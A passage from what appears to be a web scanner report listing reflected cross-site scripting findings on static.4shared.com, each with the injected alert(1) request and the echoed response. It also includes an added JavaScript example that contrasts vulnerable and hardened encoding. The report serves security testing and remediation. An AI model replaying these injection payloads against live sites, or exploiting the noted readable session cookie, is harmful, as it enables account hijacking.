Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7aec"-alert(1)-"b86c9662edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16f7aec&quot;-alert(1)-&quot;b86c9662edb/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEF65510DB407ACEDFB8FAF9B72454E4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:31 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.420. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad02c"-alert(1)-"a953950d00e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/close.gifad02c&quot;-alert(1)-&quot;a953950d00e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03A457731FAEC3860D53C42B8811E941.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:37 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.421. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760a5"-alert(1)-"158d4163382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images760a5&quot;-alert(1)-&quot;158d4163382/icons/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6DADEDB0265DD419843A49CE2D04781.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedba
...[SNIP]...

3.422. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73080"-alert(1)-"bd5e5c0b567 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons73080&quot;-alert(1)-&quot;bd5e5c0b567/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78DFFF9C129B528E44FF3EABA7D2E061.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.423. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b306f"-alert(1)-"f931fa8a6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16b306f&quot;-alert(1)-&quot;f931fa8a6ff/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C523391335A36A28DA2975087B407E0D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.424. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34543"-alert(1)-"e3036abd11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/stop.gif34543&quot;-alert(1)-&quot;e3036abd11
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6DA068FC8810374C5C44DC7CA61476B5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:29 GMT
Content-Length: 36244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.425. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12c3"-alert(1)-"47c5b2bb8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesd12c3&quot;-alert(1)-&quot;47c5b2bb8a7/icons/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8D748AE8041A79D72ED23919C2AEE58.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.426. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2cc"-alert(1)-"2ebb09db008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9e2cc&quot;-alert(1)-&quot;2ebb09db008/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CE99907F2C97B1C657CAD61A79B27113.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.427. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a8"-alert(1)-"2d8bde7f418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misce87a8&quot;-alert(1)-&quot;2d8bde7f418/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=64D6C4F34E3F9C45C1E0317EB44FE0FF.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...
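Every finding in this run shares one sink: the request path is concatenated into the double-quoted JavaScript string assigned to `url` inside `reportAbuse()`, so a path segment containing `"-alert(1)-"` turns the literal into the expression `"..." - alert(1) - "..."` and the 404 page itself runs it. The JavaScript below is an added example, not 4shared's code. The server-side template that emits `reportAbuse()` is not on this page, so `renderVulnerable()` is a constructed stand-in that reproduces the observable behaviour; `renderHardened()` shows the encoding the remediation text leaves unstated (URL-encode the value for the `aLink` query parameter, then emit the whole URL as a JSON string literal); `reflectedInScript()` is the scanner-style static check and `runReportAbuse()` executes each rendering with `window.open` and `alert` stubbed to record which one actually runs the payload. The host, payload and path are taken from finding 3.427; the function names, the harness and the rendered markup are assumptions.

```javascript
// Added example, not 4shared's code. renderVulnerable() is a constructed
// stand-in for the unseen server-side template behind the 404 page: the raw
// request path is concatenated into a double-quoted JavaScript string.

const ORIGIN = 'http://static.4shared.com'; // host from the report

const WINDOW_FEATURES =
  'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50';

// Vulnerable form: whatever is in requestPath lands between the quotes.
function renderVulnerable(requestPath) {
  return `<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=${ORIGIN}${requestPath}";
OpenWindow = window.open(url,windowname,'${WINDOW_FEATURES}');
OpenWindow.focus();
}
</script>`;
}

// Hardened form. One encoding per context the value crosses:
//  1. encodeURIComponent() for the aLink query parameter, so the URL is
//     well-formed and carries no raw quotes, slashes or angle brackets;
//  2. JSON.stringify() for the JavaScript string literal, so ", \ and
//     control characters can never terminate it. JSON.stringify leaves "/"
//     alone, so "</" is escaped as well; otherwise a literal "</script>"
//     inside the string would still close the element in the HTML parser.
function renderHardened(requestPath) {
  const url = '/abuse.jsp?aLink=' + encodeURIComponent(ORIGIN + requestPath);
  const literal = JSON.stringify(url).replace(/<\//g, '<\\/');
  return `<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url=${literal};
OpenWindow = window.open(url,windowname,'${WINDOW_FEATURES}');
OpenWindow.focus();
}
</script>`;
}

// Static, scanner-style check: does the payload, quotes included, appear
// verbatim inside any <script> element of the response body?
function reflectedInScript(html, payload) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].includes(payload)) return true;
  }
  return false;
}

// Dynamic check: execute the emitted script with window.open and alert
// replaced by recorders, then call reportAbuse() the way a click would.
function runReportAbuse(html) {
  const m = /<script\b[^>]*>([\s\S]*?)<\/script>/i.exec(html);
  if (!m) throw new Error('no <script> element in rendered page');
  const calls = { alerts: [], opened: [] };
  const fakeWindow = {
    open(url) { calls.opened.push(url); return { focus() {} }; },
  };
  // The original assigns OpenWindow without "var"; declaring it here keeps
  // the sandboxed run from creating a global.
  const fn = new Function('window', 'alert',
    'var OpenWindow;\n' + m[1] + '\nreportAbuse();');
  fn(fakeWindow, (x) => { calls.alerts.push(x); });
  return calls;
}

// Constructed input in the same shape as finding 3.427.
const PAYLOAD = 'e87a8"-alert(1)-"2d8bde7f418';
const ATTACK_PATH = '/images/icons/misc' + PAYLOAD + '/upload.gif';

function demo() {
  const vulnHtml = renderVulnerable(ATTACK_PATH);
  const safeHtml = renderHardened(ATTACK_PATH);
  const vuln = runReportAbuse(vulnHtml);
  const safe = runReportAbuse(safeHtml);
  return {
    vulnerableReflects: reflectedInScript(vulnHtml, PAYLOAD), // true
    vulnerableAlerts: vuln.alerts,  // [1]: "..." - alert(1) - "..." ran as code
    vulnerableUrl: vuln.opened[0],  // NaN: string minus undefined minus string
    hardenedReflects: reflectedInScript(safeHtml, PAYLOAD),   // false
    hardenedAlerts: safe.alerts,    // []: the payload stayed inside the literal
    hardenedUrl: safe.opened[0],    // /abuse.jsp?aLink=http%3A%2F%2F...%22-alert(1)-%22...
  };
}

console.log(demo());
```

Two observations from the captured responses are worth carrying into any retest. The `&quot;` in the 404 status line shows the same path is HTML-entity-encoded elsewhere in the response; that is the wrong encoding for a script context and does not reach the `reportAbuse()` string, which is why the scanner reports it as echoed unmodified. The `Set-Cookie: JSESSIONID=...; Path=/` header carries no `HttpOnly` flag, so script executing in this context can read `document.cookie` on static.4shared.com.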

3.428. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a755"-alert(1)-"4ac0d6a008 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc/upload.gif2a755&quot;-alert(1)-&quot;4ac0d6a008
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E5DB1FF8F3B4EA16522E1274F52FB585.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:28 GMT
Content-Length: 36238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.429. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f14c"-alert(1)-"566c054463f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3f14c"-alert(1)-"566c054463f/ipic.jpg HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3f14c&quot;-alert(1)-&quot;566c054463f/ipic.jpg
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEA4F5F1AC669555A6514786824F1450.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:49 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images3f14c"-alert(1)-"566c054463f/ipic.jpg";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
